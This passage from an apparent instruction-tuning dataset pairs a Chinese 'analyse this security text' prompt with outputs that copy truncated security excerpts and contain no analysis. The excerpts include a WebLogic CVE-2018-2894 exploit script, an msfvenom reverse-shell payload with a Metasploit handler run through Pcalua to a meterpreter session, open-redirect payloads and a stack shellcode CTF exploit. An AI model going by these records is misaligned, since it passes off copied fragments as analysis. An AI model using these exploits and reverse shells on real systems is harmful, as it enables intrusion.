using custom USB fastboot commands There are numerous reasons why these restrictions are placed on their hardware:  Inexperienced users will not be tricked into deliberately weakening phone security  Third parties cant load the devices with malware before sale  The manufacturer can track who is unlocking their bootloaders Common Android Bootloader Protection Analysis of an unlock on the phone was performed using USBPCAP An 0x100 byte signature was downloaded from the manufacturers servers and sent to the phone This was verified by the bootloader, which unlocked its restrictions I decided to use an older phone to analyse this functionality I set myself a challenge to break this functionality before the end of the seven day waiting period Target Device Mid-range phone released in 2017 Uses a Qualcomm Snapdragon 660 chipset  ARM64 architecture I had previously unlocked the bootloader, but could lock it again for", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Intro ## Description ![](images/intro.jpg) ## Solution: As in previous years, before being able to start working on the challenges themselves, we need to solve a riddle which will take us to the challenges. In this year's riddle, we get a single image. We have many details in the image, but it makes sense to start working from the lower bar. We can immediately recognize a zeppelin, and upon closer inspection it seems to be covered with LEDs. Also, we see the word \"Floyd\" colored pink. This should immediately hint that we're talking about bands: Led Zeppelin and Pink Floyd. After understanding that, we can also identify \"OneRepublic\" and the rapper Ice Cube(??). No, wait, that must be \"Coldplay\". Next to each band we have a timestamp. But for which songs? This is where we should reinspect the image. We can see a stairway to the sun, a kid on the roof counting stars and a sign saying \"Viva la Vida\". These are all clear references. There's one song left which isn't as obvious, but not so hard to identify from the remaining objects in the image: Sheep. The next step is to listen to the songs and identify the words at each timestamp: | Band | Song | Time | Words | | ---- | ---- | ---- | ----- | | Led Zeppelin | [Stairway to Heaven](https://youtu.be/iXQUu5Dti4g?t=315) | 5:15 | to join him | | OneRepublic | [Counting Stars](https://youtu.be/hT_nvWreIhg?t=82) | 1:22 | about the things | | Pink Floyd | [Sheep](https://youtu.be/3-oJt_5JvV4?t=155) | 2:35 | Jordan and I have seen | | Coldplay | [Viva la Vida](https://youtu.be/dvgZkm1xWPE?t=79) | 1:19 | sword and shield | Notice also, there's an \"un\" between OneRepublic and Pink Floyd. So, putting it all together to a phrase that makes sense in the context, we get \"Join the Unseen Shield\", which is a reference to the ISA's motto - \"מגן ולא יראה\" - \"The Unseen Shield\". The challenges were available at `https://www.jointheunseenshield.com/`.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/env python # coding:utf-8 # Build By LandGrey from __future__ import print_function from builtins import str import re import sys import time import argparse import requests import traceback import xml.etree.ElementTree as ET def get_current_work_path(host): geturl = host + \"/ws_utc/resources/setting/options/general\" ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'} values = [] try: request = requests.get(geturl) if request.status_code == 404: exit(\"[-] {} don't exists CVE-2018-2894\".format(host)) elif \"Deploying Application\".lower() in request.text.lower(): print(\"[*] First Deploying Website Please wait a moment ...\") time.sleep(20) request = requests.get(geturl, headers=ua) if \"</defaultValue>\" in request.content: root = ET.fromstring(request.content) value = root.find(\"section\").find(\"options\") for e in value: for sub in e: if e.tag == \"parameter\" and sub.tag == \"defaultValue\": values.append(sub.text) except requests.ConnectionError: exit(\"[-] Cannot connect url: {}\".format(geturl)) if values: return values[0] else: print(\"[-] Cannot get current work path\\n\") exit(request.content) def get_new_work_path(host): origin_work_path = get_current_work_path(host) works = \"/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css\" if \"user_projects\" in origin_work_path: if \"\\\\\" in origin_work_path: works = works.replace(\"/\", \"\\\\\") current_work_home = origin_work_path[:origin_work_path.find(\"user_projects\")] + \"user_projects\\\\domains\" dir_len = len(current_work_home.split(\"\\\\\")) domain_name = origin_work_path.split(\"\\\\\")[dir_len] current_work_home += \"\\\\\" + domain_name + works else: current_work_home = origin_work_path[:origin_work_path.find(\"user_projects\")] + \"user_projects/domains\" dir_len = len(current_work_home.split(\"/\")) domain_name = origin_work_path.split(\"/\")[dir_len] current_work_home += \"/\" + domain_name + works else: current_work_home = origin_work_path p", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNetwork Protocol Reverse Engineering Eavesdropping on the Machines Tim Estell  BAE Systems Katea Murray  Leidos 2016-08-05 Estell/Murray Eavesdropping on the Machines 2 What is this talk about?  Eavesdropping on the machines  Machines are going to have a communications protocol  We may not have seen it and they probably wont tell us  We need to break down their protocol  Providing a repeatable process for reverse engineering protocols on your networks (there are many)  Giving you an approach for hacking the ICS Village 2016-08-05 Estell/Murray Eavesdropping on the Machines 3 What well cover  Overview  What is protocol reverse engineering  Why you should care  How hard can it be?  Process  Walk through the process steps  Wrap Up  Tips and Tools  Staying Motivated What is NPRE? NPRE = Network Protocol Reverse Engineering Its an Approach or a Process Figuring out how machines are talking to each other so you can  Listen in  Control the conversation Analysis of network data captures  Understanding the protocols  Breaking them down to something you can interpret 2016-08-05 Estell/Murray Eavesdropping on the Machines Slide 4 Wait, arent there tools for that? Yes, there are!  libpcap and tcpdump  Available for Windows, Linux, Mac  Wireshark  Available for Windows, Linux, Mac  Scapy  Python based, extensible  Fuzzing - http://tools.kali.org/tag/fuzzing  IDA Pro/OllyDbg  Good for APIs  Hex editors  for modifications to packets Unknown Protocols  Tool Limitations  Breakage 2016-08-05 Estell/Murray Eavesdropping on the Machines Slide 5 Motivation?  Pentest  Because hexdumps wont convince the customer  Home  Because you want to know what leaves your network  Testing  Because developers are optimistic and/or wrong  Monitoring  Because node forgery and impersonation are so easy  Curiosity  Youd just like to know 2016-08-05 Estell/Murray Eavesdropping on the Machines Slide 6 How Hard Can It Be?  People design protocols  and people are predictable  But there are a lot of variations", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nlpstat === 显示CUPS中打印机的状态信息 ## 补充说明 **lpstat命令** 用于显示CUPS中打印机的状态信息 ### 语法 ```shell lpstat(选项) ``` ### 选项 ```shell -E与打印机连接时加密 -R显示打印任务的等级 -U指定可选用户名 -a显示接受打印任务的打印机 -c显示打印机类 -d显示默认打印机 -h指定可选的服务器信息 -l显示长格式 -p显示指定打印机以及打印机是否接受打印任务 -s显示汇总信息 -t显示所有的状态信息 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAutomated Discovery of Deserialization Gadget Chains Ian Haken DEF CON 26, 2018 Automated Discovery of Deserialization Gadget Chains Ian Haken $ whoami Senior Security Software Engineer on Netflixs Platform Security team. Netflix is a microservice ecosystem and we build security services and libraries to keep those applications safe:  Secrets at Scale  Crypto as a service  Netflix-wide Authorization @ianhaken https://github.com/JackOfMostTrades Automated Discovery of Deserialization Gadget Chains Ian Haken Deserialization Gadget Chains  What is a deserialization vulnerability?  A brief history of deserialization vulnerabilities  What is a deserialization gadget chain?  Why focus on gadget chains?  Building a tool to find gadget chains  Exploits discovered Automated Discovery of Deserialization Gadget Chains Ian Haken W hat is a Deserialization Vulnerability? Automated Discovery of Deserialization Gadget Chains Ian Haken In object oriented languages (like Java), data is contained in classes and classes contain code. W hat is a Deserialization Vulnerability? Automated Discovery of Deserialization Gadget Chains Ian Haken In object oriented languages (like Java), data is contained in classes and classes contain code. Controlling Data Types => Controlling Code! W hat is a Deserialization Vulnerability? Automated Discovery of Deserialization Gadget Chains Ian Haken In object oriented languages (like Java), data is contained in classes and classes contain code. Controlling Data Types => Controlling Code! W hat is a Deserialization Vulnerability? @POST public String renderUser( HttpServletRequest request) { ObjectInputStream ois = new ObjectInputStream( request.getInputStream()); User user = (User) ois.readObject(); return user.render(); } Automated Discovery of Deserialization Gadget Chains Ian Haken In object oriented languages (like Java), data is contained in classes and classes contain code. Controlling Data Types => Controlling Code! W hat is a Deserialization Vulnera", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndalfox源码学习 在信息流上看到有人star这个项目dalfox是一个基于golang的xss扫描器介绍说基于golang/DOM parser 好像以前就看过这个项目但是忘了大概今天看到有人star了这个项目于是好奇的又看了看看到 它的简介基于DOM parser以为很厉害看了源码才发现当初忘了这个项目就是因为它很一般 还是用的批量payload打从返回页面找payload那一套虽然找的方法改进了一下每个payload都包 含一个class直接用css语法找 .dalfox 的标签判断但检测一个参数还是要发很多payload不符合 现在的xss扫描逻辑了 但我还是写一下它的源码学习说说它的好与不好的地方防止我以后再忘记 介绍 Github地址: https://github.com/hahwul/dalfox 看它列举的一些feature 其中一些比较好的点是 鉴定反射点的位置静态分析csp检测其他漏洞pipeline支持 鉴定反射点位置 相关函数在 pkg/optimization/abstraction.go 它有一个分类把反射点的位置归为了这么几类 分别是反射点在html上在js上在标签的属性上和在标签的script上 在这些上面又有一个分类 会判断反射点在单引号双引号还是`符号里 dalfox判断的方式bug很多就是用纯文本查找字符串的开始和结束位置排序位置信息根据每个位 置信息生成一个 开始 和 结束 的标记看payload最终在哪个标记里面 这地方应该直接用dom解析来做简单省力 modeMap[1] = \"inHTML\" modeMap[2] = \"inJS\" modeMap[3] = \"inATTR\" modeMap[4] = \"inTagScript\" positionMap[1] = \"none\" positionMap[2] = \"double\" // \" positionMap[3] = \"single\" // ' positionMap[4] = \"backtick\" // ` positionMap[5] = \"comment\" positionMap[6] = \"pre\" positionMap[7] = \"textarea\" CSP绕过 相关函数 pkg/scanning/csp.go 这块比较新颖网上有一些收集的csp绕过列表 如果网站的csp策略域名是这些域名的话就可以根据这些payload绕过 判断函数 https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/XSS%20 Injection/Intruders/jsonp_endpoint.txt if resp.Header[\"Content-Security-Policy\"] != nil { policy[\"Content-Security-Policy\"] = resp.Header[\"Content-Security-Policy\"] [0] result := checkCSP(policy[\"Content-Security-Policy\"]) if result != \"\" { policy[\"BypassCSP\"] = result } } 这块扫描器可以学习下它是直接硬编码写死进去了可以弄个脚本批量生成一下 检测其他漏洞 官网写着还能检测 sqli  ssti  open-redirects  crlf 主要就是靠发payload ssti重定向crlf可以发payload玩玩回显的结果就能验证了sqli就算了下面是payload //basic open redirect payloads func getOpenRedirectPayload() []string { payload := []string{ \"//google.com\", \"//google.com/\", \"//google.com/%2f..\", \"///google.com/%2f..\", \"////google.com/%2f..\", \"https://google.com/%2f..\", \"/https://google.com/%2f..\", \"//www.google.com/%2f%2e%2e\", \"///www.google.com/%2f%2e%2e\", \"////www.google.com/%2f%2e%2e\", \"https://www.google.com/%2f%2e%2e\", \"/https://www.google.com/%2f%2e%2e\", \"//google.com/\", \"///google.com/\", \"", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Adam Donenfeld STUMPING THE MOBILE CHIPSET New 0days from down under AGENDA  Android chipsets overview in ecosystem  Qualcomm chipset subsystems overview  New kernel vulnerabilities  Exploitation of a new kernel vulnerability  Conclusions ~ $ man Adam ADAM DONENFELD  Years of experience in research (both PC and mobile).  Vulnerability assessment  Vulnerability exploitation  Senior security researcher at Check Point  In meiner Freizeit, lerne ich Deutsch gern 4 How Android gets to your device OEM Chipset code Android Project Linux Kernel Carrier 5 Qualcomms chipset subsystems [Protected] Non-confidential content Qualcomm IPC Router GPU Thermal QSEECOM Performance Audio 6 The Rooting Zoo 7 ASHmenian Devil (ashmem vulnerability) CVE-2016-5340 Qualcomm expands ashmem for the GPU Map ashmem to GPU Passing ashmem fd to map 8 ASHmenian devil (ashmem vulnerability) 9 ASHmenian devil (ashmem vulnerability) Qualcomm expands ashmem for the GPU Map ashmem to GPU Passing ashmem fd to map Is our fd an ashmem file descriptor? 10 ASHmenian devil (ashmem vulnerability) Qualcomm expands ashmem for the GPU Map ashmem to GPU Passing ashmem fd to map Is the fd an ashmem fd? 11 ASHmenian devil (ashmem vulnerability) Qualcomm expands ashmem for the GPU Map ashmem to GPU Passing ashmem fd to map 12 ASHmenian devil  PoC Filename on root path == ashmem / is read-only /sdcard is a symlink Obb (Opaque Binary Blob) 13 ASHmenian devil  PoC Create an OBB With ashmem in its root directory Mount the OBB Map ashmem memory to the GPU Pass a fd to your fake ashmem file 14 Qualaroot (IPC Router vulnerability) CVE-2016-2059 Qualcomms IPC router Special socket family AF_MSM_IPC (27) Unique features Whitelist for services that are permitted to communicate Everyone gets an address for communication Creation\\destruction can be monitored by anyone Requires no permission 15 Qualaroot AF_MSM_IPC socket types CLIENT_PORT SERVER_PORT IRSC_PORT CONTROL_PORT Conversion via IPC_ROUTER_IOCTL_BIND_CONTROL_PORT Each", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMixminion: Design of a Type III Anonymous Remailer Protocol George Danezis1, Roger Dingledine2, David Hopwood3, and Nick Mathewson2 1 Cambridge University <george.danezis@cl.cam.ac.uk> 2 The Free Haven Project <{arma,nickm}@freehaven.net> 3 Independent consultant <david.hopwood@zetnet.co.uk> Abstract. We present Mixminion, a message-based anonymous remailer protocol that supports secure single-use reply blocks. MIX nodes cannot distinguish Mixminion forward messages from reply messages, so forward and reply messages share the same anonymity set. We add directory servers that allow users to learn public keys and performance statistics of participating remailers, and we describe nymservers that allow users to maintain long-term pseudonyms using single-use reply blocks as a prim- itive. Our design integrates link encryption between remailers to provide forward anonymity. Mixminion brings together the best solutions from previous work to create a conservative design that protects against most known attacks. Keywords: anonymity, MIX-net, peer-to-peer, remailer, nymserver, reply block 1 Introduction Chaum first introduced anonymous remailer designs over 20 years ago [9]. The research community has since introduced many new designs and proofs [1, 5, 19, 2123, 34, 35], and discovered a variety of new attacks [4, 6, 7, 12, 29, 38], but the state of deployed remailers has changed remarkably little since Cottrell published his Mixmaster software [10, 32] in 1994. Part of the difficulty in expanding the deployed remailer base is due to the liability involved in running a remailer node on the Internet, and part is due to the complexity of the current infrastructure  it is fairly hard to add new experimental features to the current software. The Mixminion Project aims to deploy a cleaner remailer design in the same spirit as Mixmaster, with the goals of expanding deployment, documenting our design decisions and how well they stand up to all known attacks, and providing a research ba", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nbzip2recover === 恢复被破坏的.bz2压缩包中的文件 ## 补充说明 **bzip2recover命令** 可用于恢复被破坏的.bz2压缩包中的文件 bzip2是以区块的方式来压缩文件每个区块视为独立的单位因此当某一区块损坏时便可利用bzip2recover试着将文件中的区块隔开来以便解压缩正常的区块通常只适用在压缩文件很大的情况 ### 语法 ```shell bzip2recover(参数) ``` ### 参数 文件指定要恢复数据的.bz2压缩包", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMedical device security -- Anirudh Duggal Disclaimer: The views in the presentation are entirely my own and do not reflect the views of my employer. Before we begin  Thank you HITCON  Specially thank the organizing team  Jal , Pineapple, Turkey, Shanny, Shang and all the people whom Ive troubled till now About me  Senior Software Engineer at Philips health tech  anirudhduggal@gmail.com  Sustainability enthusiast  Interested in medical devices, IOT devices and hardened OS  Part of Null community Nullcon CFP is out! Agenda  What is a medical device?  Range of medical devices  Medical record value and breaches  Challenges  Besides challenges  Hl7 messaging What is a medical device?  A medical device is an instrument, apparatus, implant, in vitro reagent, or similar or related article that is used to diagnose, prevent, or treat disease or other conditions, and does not achieve its purposes through chemical action within or on the body (which would make it a drug) -- wiki Range of devices Cost: 5 2$ (50% off) Fits in pocket Cost: can reach up to 3 million $ Size: about the size of a truck (dont ask the weight ;) ) And the memory A hospital data center A simple DIY device And.  Patient monitors  Insulin monitors  Pacemakers  Heart rate devices  smart bands  Home monitoring solutions Rapid Innovation  Everyone wants mobility (patient, doctors, nurses, clinicians)  Diagnostics  Big data analysis  Information gathering Why hospitals and medical devices?  Easy targets  Many entry points  Good payoff  Medical records The impact of an attack  Privacy  Financial  a medical record fetches 32x a credit card record  Physical? Lets take a case study Analyzing a hospital scenario A typical hospital scenario EMR (electronic medical record) Patient monitors LAN / WIFI/ Bluetooth/ Doctor's PC / Secretary PC Doctor's Mobile/ Nurse mobile Other hospitals Other systems A typical patient monitor Lan / WiFI TCP / IP HL7 Serial ports EMR Other peripheral devices USB Diving into medical device", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDIY Hardware implant over I2C Part of the NSA Playset This slide deck will change for the talk to include more information and details! Josh Datko and Teddy Reed DEF CON 2 2 August 10, 2014 Josh Datko and Teddy Reed (DEF CON 2 2 ) DIY Hardware implant over I2C August 10, 2014 1 / 49 Outline 1 NSA Playset DEF CON Series 2 I2C Attack Points 3 I2C Module 4 Controller Device 5 GSM Module 6 WAGONBED Improvements 7 GSM Exfil Alternaive: Audio 8 Wrapup Josh Datko and Teddy Reed (DEF CON 2 2 ) DIY Hardware implant over I2C August 10, 2014 2 / 49 NSA Playset Series What is the NSA Playset? We hope the NSA Playset will make cutting edge security tools more accessible, easier to understand, and harder to forget. NSA Playset Talks RF Retroreflector Penn & Teller Friday 12:00 DIY Hardware Implant Penn & Teller Sunday 11:00 GSM Sniffing Penn & Teller Sunday 12:00 PCIe Penn & Teller Sunday 14:00 Josh Datko and Teddy Reed (DEF CON 2 2 ) DIY Hardware implant over I2C August 10, 2014 3 / 49 Inspired by the NSA The NSA apparently has a hardware hacking catalog.1 Flip. . . Flip. . . Flip. . . 1like SkyMall for spies and without the Bigfoot. Josh Datko and Teddy Reed (DEF CON 2 2 ) DIY Hardware implant over I2C August 10, 2014 4 / 49 Inspired by the NSA The NSA apparently has a hardware hacking catalog.1 Flip. . . Flip. . . Flip. . . Oh look honey, theres an I2C controller board we can get. It attaches to a computer and its modular, so you can add a GSM cell phone for exfil. 1like SkyMall for spies and without the Bigfoot. Josh Datko and Teddy Reed (DEF CON 2 2 ) DIY Hardware implant over I2C August 10, 2014 4 / 49 Inspired by the NSA The NSA apparently has a hardware hacking catalog.1 Flip. . . Flip. . . Flip. . . Oh look honey, theres an I2C controller board we can get. It attaches to a computer and its modular, so you can add a GSM cell phone for exfil. Thats nice dear. 1like SkyMall for spies and without the Bigfoot. Josh Datko and Teddy Reed (DEF CON 2 2 ) DIY Hardware implant over I2C A", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1202-win-间接命令执行-基于Pcalua执行payload(白名单) ## 来自ATT&CK的描述 可以使用各种Windows实用程序来执行命令而不需要调用cmd例如Forfiles程序兼容性助手pcalua.exeWSLWindowsSubsystem for Linux组件以及其他实用程序可以从命令行界面运行窗口或通过脚本来调用程序和命令的执行 攻击者可能会滥用这些功能来规避防御尤其是在破坏检测和/或缓解控制如组策略的同时执行任意动作这些控制限制/阻止了cmd或恶意负载相关文件扩展名的使用 ## 测试案例 Windows进程兼容性助理(Program Compatibility Assistant)的一个组件 说明Pcalua.exe所在路径已被系统添加PATH环境变量中因此Pcalua命令可识别 Windows 7 默认位置 C:\\Windows\\System32\\pcalua.exe 补充说明在高版本操作系统中可以通过配置策略对进程命令行参数进行记录日志策略开启方法`本地计算机策略>计算机配置>管理模板>系统>审核进程创建>在过程创建事件中加入命令行>启用`同样也可以在不同版本操作系统中部署sysmon通过sysmon日志进行监控 ## 检测日志 windows 安全日志需要自行配置 ## 测试复现 ### 环境准备 攻击机Kali2019 靶机win7 ### 攻击分析 #### 生成payload ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.146 LPORT=6666 -f exe > shell.exe ``` #### MSF配置 ```bash msf5 exploit(multi/handler) > back msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.126.146 lhost => 192.168.126.146 msf5 exploit(multi/handler) > set lport 5555 lport => 5555 msf5 exploit(multi/handler) > exploit ``` #### 靶机执行payload ```cmd Pcalua -m -a \\\\192.168.1.119\\share\\shell.exe #可远程加载 Pcalua -m -a C:\\Users\\12306Br0\\Desktop\\a\\shell.exe #可本地加载 ``` #### 反弹shell ```bash Msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.126.146:6666 [*] Sending stage (180291 bytes) to 192.168.126.149 [*] Meterpreter session 4 opened (192.168.126.146:6666 -> 192.168.126.149:49163) at 2020-04-19 00:12:39 +0800 meterpreter > getuid Server username: 12306Br0-PC\\12306Br0 meterpreter > getpid Current pid: 2804 ``` ## 测试留痕 ```log #sysmon日志 EventID: 1 Process Create: RuleName: UtcTime: 2020-04-18 16:12:37.744 ProcessGuid: {bb1f7c32-26f5-5e9b-0000-001075120e00} ProcessId: 2148 Image: C:\\Windows\\System32\\pcalua.exe FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255) Description: Program Compatibility Assistant Product: Microsoft Windows Operating System Company: Microsoft Corpora", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBUGS IN MULTIPLAYER GAME ENGINES FINDING + EXPLOITING BACKGROUND > Over a few months I found 10+ remotely exploitable bugs in 2 game engines > Im going to talk about 4 of these bugs (2 per engine) GAME ENGINES > The term Game Engine refers to the base software on which most video games are created > The popularity of many game engines means that lots of game share the same bugs > Updating your game engine can be a huge pain > Games dont often get security patches after release GAME ENGINES > General understanding is that two engines are the most common: > Unreal Engine 4 (Or UE4) > Unity > If youre a solo developer or small team, theres a good chance youre using Unity > If youre a larger team and havent built your own engine, youre probably using UE4 UNREAL ENGINE 4 > Created by Epic Games > Named for its roots in the Unreal series > Open source (With licensing restrictions) > Notable games: > Fortnite > PlayerUnknowns Battlegrounds (PUBG) UNITY > Created by Unity Technologies > Core components are closed source > Core networking library is called UNET > Games using UNET: > Countless indie releases on Steam UNET > UNET is technically deprecated, but Unity Technologies has not released an alternative > UNET still receives patches and even occasional new features > Encryption API was added post-deprecation > A TON of new and existing games use UNET MULTIPLAYER PROTOCOLS > The evolution of multiplayer architectures has largely focused on two things > Increasing performance > Moving trust away from the client > These are often conflicting goals MULTIPLAYER PROTOCOLS > To understand multiplayer protocols we should understand the attacks they aim to prevent > A good example of the evolution of multiplayer protocols is the evolution of Movement Hacking MOVEMENT HACKING > One of the oldest and most common types of game hack is manipulating the players location > In the good old days, player location was trusted to the client > Manipulate location client-side and we can telep", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecurity Measurement and Assuring Reliability through metrics Technology ( SMART) Applying Reliability Metrics to Security Vulnerabilities Wayne Zage, Dolores Zage, Blake Self Presentation Outline 1. Background/overview of S2ERC and design metrics 2. Vulnerability Analyses Security and Software Engineering Research Center (S2ERC)  An NSF Industry/University Cooperative Research Center established in 1986 and extended in 2010  Participation by ten+ universities representing >50 researchers  Collaborative, customized projects and technology transfer to affiliates are the hallmarks of the S2ERC S2ERC Participating Universities Ball State DePaul Illinois at Chicago Iowa State IUPUI IPFW Penn State Purdue West Florida Limerick S2ERC Industrial Affiliates Angies List Bingham McHale Blue Cross Blue Shield Boeing John Deere Intelligent Information Technologies Iowa Dept. of Transportation Lockheed Martin MacAulay Brown NASA Northrop Grumman Ontario Systems Raytheon NSWC  Crane Rockwell Collins TIAA Union Pacific US Army Research Lab US Dept. of Homeland Security 6 1986 1986 1989 1989 1993 1993 1999 1999 2003 2003 2005 2005 Reliability Study Reliability Study Technology Technology Development Development Industry Industry Validation Studies Validation Studies Ada Ada CC C++ C++ Java UML Java UML Industry Industry SE Symposium SE Symposium 2004 2004 Industry Industry Mission Assurance Mission Assurance Forum Forum Published Papers Published Papers High Reliability High Reliability Process Development Process Development Industry Validation Industry Validation  Northrop Grumman, Motorola, Northrop Grumman, Motorola, Bellcore Bellcore, Raytheon, Army , Raytheon, Army Industry Industry Industry Industry Development Development Dissemination Dissemination SERC SERC Research Research SDL SDL Industry Industry Workshops Workshops Process Process Deployment Deployment SERC SERC Technical Report Technical Report NASA NASA Symposium Symposium Industry funded Industry funded SERC Resea", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWriting Fiction to Tell the Truth By Richard Thieme Things are often not what they seem. Thats a fact. But that fact and others are filtered into our brains through images and words that often distort the truthsometimes due to sloppy thinking but often as a result of policies adopted by the national security state, a complex state of affairs that carried over from World War 2 and has never stopped. The consequences of this shift are profound. A regimen of propaganda and censorship established during World War 2 made sense. The government did not want Americans to know that debris and bodies, for example, washed up along the Atlantic coast all the time due to U-boat activity. That secret and others were well kept with the cooperation of the media that served as portals into the mind of society. The Cold War, an enterprise that used propaganda and censorship as weapons, ensured that these policies would continue. Playing the great game of perception management on a global scale, information operations inevitably framed the thinking of Americans as well as enemies. Enemies and citizens, hearing the same narratives, became indistinguishable. Eisenhower, assisted by the Dulles brothers at the State Department and the CIA, was afforded plausible deniability of the use of covert operations (e.g. the overthrow of Irans Mossadegh and Argentinas Arbenz) and established a pattern for subsequent secret operations. I asked a historian at NSA what historical events we could discuss with a reasonable expectation that our words meant the same details. Anything up to 1945, he said with a laugh  but he wasnt kidding. The end of the Cold War did not end those policies.. New technologies enhanced the science of perception management. Cover stories weave truths, half-truths, and lies in a way that makes it impossible for average citizens to know whats real. The attack on 9/11 was a catalyst to do even more, and today, social media serve as accelerators for spreading the arson fires of d", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Binary Gauntlet 1 Category: Binary Exploitation, 30 points ## Description > Okay, time for a challenge. A binary file was attached. ## Solution This is the follow-up for [Binary Gauntlet 0](Binary_Gauntlet_0.md). Let's run `checksec` on the file: ```console (user@kali)-[/media/sf_CTFs/pico/Binary_Gauntlet_1] $ checksec --file=gauntlet [*] '/media/sf_CTFs/pico/Binary_Gauntlet_1/gauntlet' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments ``` We can see that there are virtually no protections for this program. Using Ghidra, we can check the decompiled output of the program: ```c undefined8 main(void) { char local_78 [104]; char *local_10; local_10 = (char *)malloc(1000); printf(\"%p\\n\",local_78); fflush(stdout); fgets(local_10,1000,stdin); local_10[999] = '\\0'; printf(local_10); fflush(stdout); fgets(local_10,1000,stdin); local_10[999] = '\\0'; strcpy(local_78,local_10); return 0; } ``` We can see the the SIGSEGV handler from the previous challenge was removed. We can also see that the local buffer's address is leaked to us. Since NX is disabled according to `checksec` and the stack is executable, if we're able to copy some shellcode to the stack we'll be able to execute it. Getting the shellcode to `local_78` which resides on the stack is easy - we just need to provide it to the second `fgets` which will conveniently copy it to `local_78` using `strcpy`. We just need to make sure that the shellcode doesn't have any NULL pointers since `strcpy` will stop copying the buffer once it hits a NULL pointer. We already know the address of `local_78` from the leak, so we just need to make sure that the program eventually jumps to it. We can do that by overflowing the stack and overriding the return pointer of `main` so that instead of returning to the function that called it, it will jump to `local_78` instead. The following script automates the process: ```python # First, generate a pwntools template", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2020年RSAC关键热点 DevSecOps左移开发安全 思路分享 2 安全圈的奥斯卡已开幕 RSAC已在美国当地时间2月24日28日开启 RSA大会是信息安全界最有影响力的业界盛会之一RSA大会一年一度分别在美国欧洲和日本 举办其议程设计由信息安全从业者及其它相关专业人士评判和制定RSA大会一直吸引着世界 上最优秀的信息安全人士创造机会让参会者跟同辈和杰出人物跟新兴企业和知名企业直接交 流了解信息安全的最重要课题 3 聊些八卦  外国友人想请你喝一杯的时候要三思 如果你有朋友或同事是第一次参与  不在非授权情况下接受外媒采访 4 一起来认识RSA RSA 大会是信息安全界最有影响力的业界盛会之一 一那它为何如此受到安全行业的重视 二创新沙盒奖项是什么 三今年的RSA又有哪些热点 5 RSA的前世今生 RSAC承接信息安全产品的过去与未来 5 2013 4 2008 3 2002 2 1995 1 1991 6 2016 起源 出发 911 呼救 斯诺登 苹果 创新沙盒成为了全球安全圈关注的话题 创新沙盒奖项信息安全的风向标 资产发现 资产分析 资产梳理 资产管理 威胁处置 协同扩展 7 RSA十大热点分享 RSA 大会宣布了第15届创新沙盒竞赛的十位决赛入围者 2020年2月24日入围RSA大会创新沙盒十强的企业将 在大会现场各自进行3分钟左右的展示并回答委员会的问题 创新沙盒的初衷是为网络安全领域的初创企业提供平台让 他们展示自己的创新技术或愿景以及他们可能为信息安全 行业带来的变革与发展Securiti.ai 已获得今年冠军 WEB安全 应用安全 代码安全 安全意识 漏洞管理 隐私安全/数据治理 邮件安全 SAAS安全 SAAS安全 从热点看未来 从入选的企业来看未来的网络安全行业 将会聚焦在隐私SaaSDevSecOps 等热点方向 https://forallsecure.com/ https://blubracket.com/ 在市场和技术的推动下近年的创新沙盒中多次出 现DevSecOps相关产品比如今年的左图两家公司 2019年的DisruptOps云基础设施检测与修复 ShiftLeft软件代码防护与审计等 融合+自动化 8 9 常见的软件生命周期 空气墙 处理滞后 沟通成本高 各为孤岛 难协调 信息不对称 意识不足 表面上看铁桶一个密不可破实际 却.. 10 DevOps的出现 Dev=Devilopment(开发) Ops=Operation(运维) 这个词是Patrick Debois于2009年创造的是公认的 DevOps之父 以自动化为基础以合作为黏合剂以业务为目标的软件全 生命周期的最佳实践 11 何为DevOps 覆盖计划需求设计到开发测试部署运维运营的封闭式全生命周期  最佳实践  成熟度模型  技术流程 12 DevOps目的 ISO27000  快速交付价值灵活响应变化  全局打通敏捷开发&高效的运维模式  